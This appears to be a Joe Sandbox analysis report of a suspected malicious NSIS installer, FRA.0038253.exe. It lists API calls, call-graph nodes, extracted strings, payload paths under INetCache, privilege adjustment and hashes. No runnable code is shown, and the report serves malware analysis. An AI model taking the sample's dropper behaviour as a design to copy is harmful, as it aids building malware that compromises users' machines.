4717->4729 4720 405fc2 4722 405d4f 4 API calls 4720->4722 4721 405fae lstrcpyA 4723 405fd0 4721->4723 4722->4723 4724 406007 SetFilePointer 4723->4724 4725 405e91 WriteFile 4724->4725 4726 40601d GlobalFree 4725->4726 4726->4714 4727->4706 4728->4712 4730 405d90 lstrlenA 4729->4730 4731 405d98 4730->4731 4732 405d69 lstrcmpiA 4730->4732 4731->4720 4731->4721 4732->4731 4733 405d87 CharNextA 4732->4733 4733->4730 5970 401922 5971 401959 5970->5971 5972 402c5e 21 API calls 5971->5972 5973 40195e 5972->5973 5974 405a19 71 API calls 5973->5974 5975 401967 5974->5975 4751 4024a3 4752 402c5e 21 API calls 4751->4752 4753 4024b5 4752->4753 4754 402c5e 21 API calls 4753->4754 4755 4024bf 4754->4755 4768 402cee 4755->4768 4758 402aea 4759 4024f4 4766 402500 4759->4766 4772 402c3c 4759->4772 4760 402c5e 21 API calls 4761 4024ed lstrlenA 4760->4761 4761->4759 4763 402522 RegSetValueExA 4765 402538 RegCloseKey 4763->4765 4764 403168 39 API calls 4764->4763 4765->4758 4766->4763 4766->4764 4769 402d09 4768->4769 4775 40610b 4769->4775 4773 4062ea 21 API calls 4772->4773 4774 402c51 4773->4774 4774->4766 4776 40611a 4775->4776 4777 4024cf 4776->4777 4778 406125 RegCreateKeyExA 4776->4778 4777->4758 4777->4759 4777->4760 4778->4777 5976 401d23 5977 402c3c 21 API calls 5976->5977 5978 401d29 IsWindow 5977->5978 5979 401a33 5978->5979 5980 401925 5981 402c5e 21 API calls 5980->5981 5982 40192c 5981->5982 5983 40596d MessageBoxIndirectA 5982->5983 5984 401935 5983->5984 5985 4027a5 5986 4027ab 5985->5986 5987 4027af FindNextFileA 5986->5987 5990 4027c1 5986->5990 5988 402800 5987->5988 5987->5990 5991 406257 lstrcpynA 5988->5991 5991->5990 5999 406fa9 6003 4067f7 5999->6003 6000 407162 6001 406881 GlobalAlloc 6001->6000 6001->6003 6002 406878 GlobalFree 6002->6001 6003->6000 6003->6001 6003->6002 6003->6003 6004 4068f8 GlobalAlloc 6003->6004 6005 4068ef GlobalFree 6003->6005 6004->6000 6004->6003 6005->6004 4985 401bac 4986 401bb9 4985->4986 4987 401bfd 4985->4987 4990 401c41 
4986->4990 4993 401bd0 4986->4993 4988 401c01 4987->4988 4989 401c26 GlobalAlloc 4987->4989 5003 4023b4 4988->5003 5006 406257 lstrcpynA 4988->5006 4992 4062ea 21 API calls 4989->4992 4991 4062ea 21 API calls 4990->4991 4990->5003 4994 4023ae 4991->4994 4992->4990 5004 406257 lstrcpynA 4993->5004 4999 40596d MessageBoxIndirectA 4994->4999 4994->5003 4997 401c13 GlobalFree 4997->5003 4998 401bdf 5005 406257 lstrcpynA 4998->5005 4999->5003 5001 401bee 5007 406257 lstrcpynA 5001->5007 5004->4998 5005->5001 5006->4997 5007->5003 6006 40442d lstrcpynA lstrlenA 6007 4029af 6008 402c3c 21 API calls 6007->6008 6009 4029b5 6008->6009 6010 4062ea 21 API calls 6009->6010 6011 4027ed 6009->6011 6010->6011 6019 402631 6020 402c5e 21 API calls 6019->6020 6021 402638 6020->6021 6024 405dea GetFileAttributesA CreateFileA 6021->6024 6023 402644 6024->6023 5051 4025b5 5052 402c9e 21 API calls 5051->5052 5053 4025bf 5052->5053 5054 402c3c 21 API calls 5053->5054 5055 4025c8 5054->5055 5056 4025e3 RegEnumKeyA 5055->5056 5057 4025ef RegEnumValueA 5055->5057 5060 4027ed 5055->5060 5058 40260b RegCloseKey 5056->5058 5057->5058 5059 402604 5057->5059 5058->5060 5059->5058 6025 70751000 6026 7075101b 5 API calls 6025->6026 6027 70751019 6026->6027 6028 4014b7 6029 4014bd 6028->6029 6030 401389 2 API calls 6029->6030 6031 4014c5 6030->6031

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004033C5
                                                                          • GetVersionExA.KERNEL32(?), ref: 004033EE
                                                                          • GetVersionExA.KERNEL32(0000009C), ref: 00403405
                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034CE
                                                                          • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 0040350B
                                                                          • OleInitialize.OLE32(00000000), ref: 00403512
                                                                          • SHGetFileInfoA.SHELL32(0041F8E0,00000000,?,00000160,00000000,?,00000008,0000000A,0000000C), ref: 00403530
                                                                          • GetCommandLineA.KERNEL32(spidsmus,NSIS Error,?,00000008,0000000A,0000000C), ref: 00403545
                                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\FRA.0038253.exe",00000020,"C:\Users\user\Desktop\FRA.0038253.exe",00000000,?,00000008,0000000A,0000000C), ref: 0040357F
                                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000008,0000000A,0000000C), ref: 00403678
                                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 00403689
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 00403695
                                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036A9
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036B1
                                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036C2
                                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 004036CA
                                                                          • DeleteFileA.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 004036DE
                                                                          • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C), ref: 00403789
                                                                          • ExitProcess.KERNEL32 ref: 004037AA
                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe",00000000,?,?,00000008,0000000A,0000000C), ref: 004037B9
                                                                          • wsprintfA.USER32 ref: 00403810
                                                                          • GetFileAttributesA.KERNEL32(920,C:\Users\user\AppData\Local\Temp\,920,?,0000000C), ref: 00403842
                                                                          • DeleteFileA.KERNEL32(920), ref: 0040384E
                                                                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,920,?,0000000C), ref: 0040387A
                                                                          • CopyFileA.KERNEL32(C:\Users\user\Desktop\FRA.0038253.exe,920,00000001), ref: 00403890
                                                                          • CloseHandle.KERNEL32(00000000,00426800,00426800,?,920,00000000), ref: 004038E3
                                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403900
                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403907
                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040391B
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040393A
                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 0040395F
                                                                          • ExitProcess.KERNEL32 ref: 00403980
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: File$Process$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                                                                          • String ID: "$"C:\Users\user\Desktop\FRA.0038253.exe"$1033$920$A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\FRA.0038253.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Khw$spidsmus$~nsu%X.tmp

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetDlgItem.USER32(?,00000403), ref: 00405538
                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405547
                                                                          • GetClientRect.USER32(?,?), ref: 00405584
                                                                          • GetSystemMetrics.USER32(00000002), ref: 0040558B
                                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004055AC
                                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004055BD
                                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 004055D0
                                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 004055DE
                                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 004055F1
                                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405613
                                                                          • ShowWindow.USER32(?,00000008), ref: 00405627
                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405648
                                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405658
                                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405671
                                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040567D
                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405556
                                                                            • Part of subcall function 0040432C: SendMessageA.USER32(00000028,?,00000001,0040415C), ref: 0040433A
                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405699
                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000546D,00000000), ref: 004056A7
                                                                          • CloseHandle.KERNELBASE(00000000), ref: 004056AE
                                                                          • ShowWindow.USER32(00000000), ref: 004056D1
                                                                          • ShowWindow.USER32(?,00000008), ref: 004056D8
                                                                          • ShowWindow.USER32(00000008), ref: 0040571E
                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405752
                                                                          • CreatePopupMenu.USER32 ref: 00405763
                                                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405778
                                                                          • GetWindowRect.USER32(?,000000FF), ref: 00405798
                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004057B1
                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057ED
                                                                          • OpenClipboard.USER32(00000000), ref: 004057FD
                                                                          • EmptyClipboard.USER32 ref: 00405803
                                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 0040580C
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405816
                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040582A
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405843
                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 0040584E
                                                                          • CloseClipboard.USER32 ref: 00405854
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                          • String ID: B

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • DeleteFileA.KERNELBASE(?,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe"), ref: 00405A42
                                                                          • lstrcatA.KERNEL32(00421928,\*.*,00421928,?,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe"), ref: 00405A8A
                                                                          • lstrcatA.KERNEL32(?,0040A014,?,00421928,?,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe"), ref: 00405AAB
                                                                          • lstrlenA.KERNEL32(?,?,0040A014,?,00421928,?,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe"), ref: 00405AB1
                                                                          • FindFirstFileA.KERNEL32(00421928,?,?,?,0040A014,?,00421928,?,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe"), ref: 00405AC2
                                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6F
                                                                          • FindClose.KERNEL32(00000000), ref: 00405B80
                                                                          Strings
                                                                          • "C:\Users\user\Desktop\FRA.0038253.exe", xrefs: 00405A22
                                                                          • \*.*, xrefs: 00405A84
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A26
                                                                          Similarity
                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                          • String ID: "C:\Users\user\Desktop\FRA.0038253.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          APIs
                                                                          • FindFirstFileA.KERNELBASE(77673410,00422170,00421D28,00405D1A,00421D28,00421D28,00000000,00421D28,00421D28,77673410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,77673410,C:\Users\user\AppData\Local\Temp\), ref: 004065F5
                                                                          • FindClose.KERNEL32(00000000), ref: 00406601
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID: p!B
                                                                          • API String ID: 2295610775-3221062685

                                                                          Control-flow Graph

                                                                          • Graph of the function starting at 403dfd (rendered graph not reproduced)
                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E39
                                                                          • ShowWindow.USER32(?), ref: 00403E59
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00403E6B
                                                                          • ShowWindow.USER32(?,00000004), ref: 00403E84
                                                                          • DestroyWindow.USER32 ref: 00403E98
                                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403EB1
                                                                          • GetDlgItem.USER32(?,?), ref: 00403ED0
                                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403EE4
                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403EEB
                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403F96
                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403FA0
                                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403FBA
                                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 0040400B
                                                                          • GetDlgItem.USER32(?,00000003), ref: 004040B1
                                                                          • ShowWindow.USER32(00000000,?), ref: 004040D2
                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040E4
                                                                          • EnableWindow.USER32(?,?), ref: 004040FF
                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404115
                                                                          • EnableMenuItem.USER32(00000000), ref: 0040411C
                                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00404134
                                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00404147
                                                                          • lstrlenA.KERNEL32(spidsmus: Installing,?,spidsmus: Installing,00000000), ref: 00404171
                                                                          • SetWindowTextA.USER32(?,spidsmus: Installing), ref: 00404180
                                                                          • ShowWindow.USER32(?,0000000A), ref: 004042B4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                          • String ID: spidsmus: Installing
                                                                          • API String ID: 121052019-477722755

                                                                          Control-flow Graph

                                                                          • Graph of the function starting at 403a60 (rendered graph not reproduced)
                                                                          APIs
                                                                            • Part of subcall function 0040667F: GetModuleHandleA.KERNEL32(?,00000000,?,004034E4,0000000C), ref: 00406691
                                                                            • Part of subcall function 0040667F: GetProcAddress.KERNEL32(00000000,?), ref: 004066AC
                                                                          • lstrcatA.KERNEL32(1033,spidsmus: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,spidsmus: Installing,00000000,00000002,77673410,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\FRA.0038253.exe",0000000A,0000000C), ref: 00403ADB
                                                                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek,1033,spidsmus: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,spidsmus: Installing,00000000,00000002,77673410), ref: 00403B50
                                                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 00403B63
                                                                          • GetFileAttributesA.KERNEL32(Call,?,"C:\Users\user\Desktop\FRA.0038253.exe",0000000A,0000000C), ref: 00403B6E
                                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek), ref: 00403BB7
                                                                            • Part of subcall function 004061B5: wsprintfA.USER32 ref: 004061C2
                                                                          • RegisterClassA.USER32(00423AC0), ref: 00403BF4
                                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C0C
                                                                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C41
                                                                          • ShowWindow.USER32(00000005,00000000,?,"C:\Users\user\Desktop\FRA.0038253.exe",0000000A,0000000C), ref: 00403C77
                                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,00423AC0), ref: 00403CA3
                                                                          • GetClassInfoA.USER32(00000000,RichEdit,00423AC0), ref: 00403CB0
                                                                          • RegisterClassA.USER32(00423AC0), ref: 00403CB9
                                                                          • DialogBoxParamA.USER32(?,00000000,00403DFD,00000000), ref: 00403CD8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                          • String ID: "C:\Users\user\Desktop\FRA.0038253.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$spidsmus: Installing
                                                                          • API String ID: 1975747703-3165389288

                                                                          Control-flow Graph

                                                                          • Graph of the function starting at 402f31 (rendered graph not reproduced)
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00402F42
                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\FRA.0038253.exe,00000400,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 00402F5E
                                                                            • Part of subcall function 00405DEA: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\FRA.0038253.exe,80000000,00000003,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 00405DEE
                                                                            • Part of subcall function 00405DEA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 00405E10
                                                                          • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FRA.0038253.exe,C:\Users\user\Desktop\FRA.0038253.exe,80000000,00000003,?,?,004036EC,?,?,00000008), ref: 00402FAA
                                                                          • GlobalAlloc.KERNELBASE(00000040,00000008,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 004030E0
                                                                          Strings
                                                                          • Inst, xrefs: 00403016
                                                                          • "C:\Users\user\Desktop\FRA.0038253.exe", xrefs: 00402F37
                                                                          • C:\Users\user\Desktop\FRA.0038253.exe, xrefs: 00402F48, 00402F57, 00402F6B, 00402F8B
                                                                          • soft, xrefs: 0040301F
                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403107
                                                                          • Null, xrefs: 00403028
                                                                          • Error launching installer, xrefs: 00402F81
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402F38
                                                                          • C:\Users\user\Desktop, xrefs: 00402F8C, 00402F91, 00402F97
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                          • String ID: "C:\Users\user\Desktop\FRA.0038253.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\FRA.0038253.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                          • API String ID: 2803837635-2155060087
                                                                          • Opcode ID: 9dda8f0c8f86cce6e6972106608d1071ed34c33a473a7669bd73a48644bf60ac
                                                                          • Instruction ID: 4a321ea1c49715b1b47a0bb030cb70b4d922ff216aaa97efe1fb1ba5c0ef36b3
                                                                          • Opcode Fuzzy Hash: 9dda8f0c8f86cce6e6972106608d1071ed34c33a473a7669bd73a48644bf60ac
                                                                          • Instruction Fuzzy Hash: DC51D371A01214ABDB20EFA5DD85B9E7EACEB54366F10403BF900B62D1C77C9E418B9D

                                                                          Control-flow Graph

                                                                          control_flow_graph 451 4062ea-4062f5 452 4062f7-406306 451->452 453 406308-40631d 451->453 452->453 454 406323-40632e 453->454 455 40652e-406532 453->455 454->455 456 406334-40633b 454->456 457 406340-40634a 455->457 458 406538-406542 455->458 456->455 457->458 459 406350-406357 457->459 460 406544-406548 call 406257 458->460 461 40654d-40654e 458->461 462 406521 459->462 463 40635d-406393 459->463 460->461 467 406523-406529 462->467 468 40652b-40652d 462->468 465 406399-4063a3 463->465 466 4064cb-4064ce 463->466 469 4063c0 465->469 470 4063a5-4063ae 465->470 471 4064d0-4064d3 466->471 472 4064fe-406501 466->472 467->455 468->455 476 4063c7-4063cf 469->476 470->469 475 4063b0-4063b3 470->475 477 4064e3-4064ef call 406257 471->477 478 4064d5-4064e1 call 4061b5 471->478 473 406503-40650a call 4062ea 472->473 474 40650f-40651f lstrlenA 472->474 473->474 474->455 475->469 481 4063b5-4063b8 475->481 482 4063d1 476->482 483 4063d8-4063da 476->483 486 4064f4-4064fa 477->486 478->486 481->469 487 4063ba-4063be 481->487 482->483 488 406411-406414 483->488 489 4063dc-4063f7 call 40613e 483->489 486->474 491 4064fc 486->491 487->476 492 406416-406422 GetSystemDirectoryA 488->492 493 406427-40642a 488->493 494 4063fc-4063ff 489->494 495 4064c3-4064c9 call 406551 491->495 496 4064ad-4064b0 492->496 497 40643b-40643e 493->497 498 40642c-406438 GetWindowsDirectoryA 493->498 499 4064b2-4064b6 494->499 500 406405-40640c call 4062ea 494->500 495->474 496->495 496->499 497->496 502 406440-40645e 497->502 498->497 499->495 504 4064b8-4064be lstrcatA 499->504 500->496 506 406460-406463 502->506 507 406475-406481 call 40667f 502->507 504->495 506->507 510 406465-406469 506->510 513 406489-40648d 507->513 512 406471-406473 510->512 512->496 512->507 514 4064a4-4064ab 513->514 515 40648f-4064a2 SHGetPathFromIDListA CoTaskMemFree 513->515 514->496 514->502 515->496 515->514
                                                                          APIs
                                                                          • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 0040641C
                                                                          • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004053D3,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,00000000), ref: 00406432
                                                                          • SHGetPathFromIDListA.SHELL32(00000000,Call,?,004053D3,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004053D3,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000), ref: 00406491
                                                                          • CoTaskMemFree.OLE32(00000000,?,004053D3,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004053D3,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000), ref: 0040649A
                                                                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004053D3,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000), ref: 004064BE
                                                                          • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004053D3,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,00000000,004178D8,00000000), ref: 00406510
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\7w$\Microsoft\Internet Explorer\Quick Launch
                                                                          • API String ID: 4024019347-1622798255
                                                                          • Opcode ID: 7a4fcdd4c78e333f76bb816c68d427fff657220326b08f724acd3492f18cc034
                                                                          • Instruction ID: 1c9ec7345ab22f02a0b281331869ecf5a94f5ab101962b25afda0e41a477266e
                                                                          • Opcode Fuzzy Hash: 7a4fcdd4c78e333f76bb816c68d427fff657220326b08f724acd3492f18cc034
                                                                          • Instruction Fuzzy Hash: C5610571A00211AFDB209F24EC85B7A7BA4AB55724F16813FF803B62D1C67D8D61CB5D

                                                                          Control-flow Graph

                                                                          control_flow_graph 585 40177e-4017a1 call 402c5e call 405c56 590 4017a3-4017a9 call 406257 585->590 591 4017ab-4017bd call 406257 call 405be9 lstrcatA 585->591 596 4017c2-4017c8 call 406551 590->596 591->596 601 4017cd-4017d1 596->601 602 4017d3-4017dd call 4065ea 601->602 603 401804-401807 601->603 610 4017ef-401801 602->610 611 4017df-4017ed CompareFileTime 602->611 604 401809-40180a call 405dc5 603->604 605 40180f-40182b call 405dea 603->605 604->605 613 4018a3-4018cc call 40539b call 403168 605->613 614 40182d-401830 605->614 610->603 611->610 626 4018d4-4018e0 SetFileTime 613->626 627 4018ce-4018d2 613->627 615 401832-401874 call 406257 * 2 call 4062ea call 406257 call 40596d 614->615 616 401885-40188f call 40539b 614->616 615->601 648 40187a-40187b 615->648 628 401898-40189e 616->628 630 4018e6-4018f1 CloseHandle 626->630 627->626 627->630 631 402af3 628->631 634 4018f7-4018fa 630->634 635 402aea-402aed 630->635 636 402af5-402af9 631->636 638 4018fc-40190d call 4062ea lstrcatA 634->638 639 40190f-401912 call 4062ea 634->639 635->631 645 401917-4023af 638->645 639->645 649 4023b4-4023b9 645->649 650 4023af call 40596d 645->650 648->628 651 40187d-40187e 648->651 649->636 650->649 651->616
                                                                          APIs
                                                                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek,00000000,00000000,00000031), ref: 004017BD
